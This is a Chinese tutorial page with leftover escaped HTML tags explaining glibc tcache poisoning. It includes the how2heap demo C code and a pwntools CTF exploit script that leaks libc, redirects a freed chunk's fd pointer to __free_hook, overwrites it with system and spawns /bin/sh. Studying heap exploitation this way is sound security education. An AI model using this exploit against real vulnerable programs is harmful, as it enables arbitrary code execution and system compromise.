Tcache Poisoning 攻击技术详解<\/h1>

1. 基本概念<\/h2>
Tcache (Thread Local Caching) 是 glibc 2.26 版本引入的线程本地缓存机制，用于提高堆分配性能。由于省略了很多安全保护机制，tcache 成为堆漏洞利用的重要目标。<\/p>
Tcache poisoning 是一种通过覆盖 tcache 中的 next 指针来实现任意地址分配的利用技术。<\/p>

2. 攻击原理<\/h2>

2.1 核心机制<\/h3>
tcache_get()<\/code> 函数没有对 next 指针进行安全检查<\/li>
通过修改 tcache bin 中的 next 指针，可以将其指向任意地址<\/li>
后续的 malloc 调用会返回攻击者控制的地址<\/li>
<\/ul>
2.2 与 fastbin corruption 的区别<\/h3>

类似 fastbin corruption 攻击<\/li>
但 tcache 的安全检查更少，利用更简单<\/li>
不需要伪造 chunk 结构<\/li>
<\/ul>
3. 攻击演示<\/h2>
3.1 how2heap 示例代码分析<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdint.h><\/span>
<\/span><\/span><\/span>#include<\/span> <assert.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 禁用缓冲
<\/span><\/span><\/span><\/span>    setbuf(stdin, NULL);
<\/span><\/span>    setbuf(stdout, NULL);
<\/span><\/span>    
<\/span><\/span>    printf("演示通过欺骗 malloc 返回指向任意位置(本例为栈)的指针<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    
<\/span><\/span>    size_t stack_var;
<\/span><\/span>    printf("我们希望 malloc 返回的地址: %p<\/span>\n<\/span>"<\/span>, (char<\/span> *<\/span>)&<\/span>stack_var);
<\/span><\/span>    
<\/span><\/span>    \/\/ 分配两个缓冲区
<\/span><\/span><\/span><\/span>    intptr_t *<\/span>a =<\/span> malloc(128<\/span>);
<\/span><\/span>    intptr_t *<\/span>b =<\/span> malloc(128<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 释放缓冲区
<\/span><\/span><\/span><\/span>    free(a);
<\/span><\/span>    free(b);
<\/span><\/span>    
<\/span><\/span>    printf("当前 tcache 链表: [ %p -> %p ]<\/span>\n<\/span>"<\/span>, b, a);
<\/span><\/span>    
<\/span><\/span>    \/\/ 覆盖 b 的 fd 指针
<\/span><\/span><\/span><\/span>    b[0<\/span>] =<\/span> (intptr_t)&<\/span>stack_var;
<\/span><\/span>    printf("修改后 tcache 链表: [ %p -> %p ]<\/span>\n<\/span>"<\/span>, b, &<\/span>stack_var);
<\/span><\/span>    
<\/span><\/span>    \/\/ 第一次分配
<\/span><\/span><\/span><\/span>    printf("第一次 malloc(128): %p<\/span>\n<\/span>"<\/span>, malloc(128<\/span>));
<\/span><\/span>    
<\/span><\/span>    \/\/ 第二次分配将返回目标地址
<\/span><\/span><\/span><\/span>    intptr_t *<\/span>c =<\/span> malloc(128<\/span>);
<\/span><\/span>    printf("第二次 malloc(128): %p<\/span>\n<\/span>"<\/span>, c);
<\/span><\/span>    
<\/span><\/span>    assert((long<\/span>)&<\/span>stack_var ==<\/span> (long<\/span>)c);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 攻击流程<\/h3>

分配两个相同大小的 chunk (A 和 B)<\/li>
按顺序释放 B 和 A，形成链表 B → A<\/li>
修改 B 的 fd 指针指向目标地址 (如栈变量)<\/li>
第一次 malloc 返回 B<\/li>
第二次 malloc 返回目标地址<\/li>
<\/ol>
4. 实际漏洞利用<\/h2>
4.1 典型漏洞条件<\/h3>

存在 Use-After-Free (UAF) 漏洞<\/li>
能够修改 freed chunk 的内容<\/li>
能够控制分配和释放的顺序<\/li>
<\/ul>
4.2 利用步骤<\/h3>


泄露 libc 基址<\/strong><\/p>

分配一个 unsorted bin 大小的 chunk (大于 0x410)<\/li>
释放后通过 UAF 泄露 main_arena 地址<\/li>
计算 libc 基址<\/li>
<\/ul>
<\/li>

准备 tcache 链表<\/strong><\/p>

分配多个 tcache 大小的 chunk<\/li>
释放两个形成链表<\/li>
<\/ul>
<\/li>

修改 fd 指针<\/strong><\/p>

利用 UAF 修改链表尾部的 fd 指针<\/li>
指向目标地址 (如 __free_hook)<\/li>
<\/ul>
<\/li>

获取控制权<\/strong><\/p>

分配 chunk 获取目标地址控制权<\/li>
修改 __free_hook 为 system 或 one_gadget<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 例题分析<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span># 初始化<\/span>
<\/span><\/span>p =<\/span> process('.\/pwn'<\/span>)
<\/span><\/span>libc =<\/span> ELF('.\/libc-2.31.so'<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露 libc<\/span>
<\/span><\/span>add(0x438<\/span>)      # unsorted bin 大小<\/span>
<\/span><\/span>add(0x50<\/span>)       # tcache 大小<\/span>
<\/span><\/span>add(0x50<\/span>)
<\/span><\/span>add(0x50<\/span>)       # 隔离 top chunk<\/span>
<\/span><\/span>dele(0<\/span>)
<\/span><\/span>show(0<\/span>)
<\/span><\/span>libc_base =<\/span> u64(p.<\/span>recvuntil('<\/span>\x7f<\/span>'<\/span>)[-<\/span>6<\/span>:].<\/span>ljust(8<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)) -<\/span> 0x1ecbe0<\/span>
<\/span><\/span>free_hook =<\/span> libc_base +<\/span> libc.<\/span>sym['__free_hook'<\/span>]
<\/span><\/span>system =<\/span> libc_base +<\/span> libc.<\/span>sym['system'<\/span>]
<\/span><\/span>
<\/span><\/span># tcache poisoning<\/span>
<\/span><\/span>dele(1<\/span>)
<\/span><\/span>dele(2<\/span>)
<\/span><\/span>edit(2<\/span>, p64(free_hook))  # 修改 fd 指向 __free_hook<\/span>
<\/span><\/span>
<\/span><\/span># 获取控制权<\/span>
<\/span><\/span>add(0x50<\/span>)       # 获取 chunk2<\/span>
<\/span><\/span>add(0x50<\/span>)       # 获取 __free_hook<\/span>
<\/span><\/span>edit(5<\/span>, p64(system))  # 修改 __free_hook 为 system<\/span>
<\/span><\/span>
<\/span><\/span># getshell<\/span>
<\/span><\/span>edit(1<\/span>, b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>dele(1<\/span>)         # 触发 system("\/bin\/sh")<\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>5. 防御机制<\/h2>

glibc 2.32 引入了 Safe-Linking 机制，对 tcache 的 next 指针进行异或加密<\/li>
但早期版本 (如 2.31) 仍可被利用<\/li>
<\/ul>
6. 关键点总结<\/h2>

链表操作顺序<\/strong>：后释放的 chunk 在链表头部，先释放的在尾部<\/li>
大小选择<\/strong>：tcache 适用于小于 0x410 的 chunk<\/li>
UAF 利用<\/strong>：必须能够修改 freed chunk 的 fd 指针<\/li>
目标选择<\/strong>：常用目标包括 __free_hook、__malloc_hook 或栈地址<\/li>
限制条件<\/strong>：需要能够控制分配和释放的顺序<\/li>
<\/ol>
7. 扩展知识<\/h2>

可以结合其他技术如 House of Spirit 使用<\/li>
在 glibc 2.32+ 上需要绕过 Safe-Linking<\/li>
类似的攻击还有 tcache dup、tcache stash 等<\/li>
<\/ul>
通过掌握 tcache poisoning 技术，可以深入理解 glibc 堆管理机制，为更复杂的堆利用打下基础。<\/p>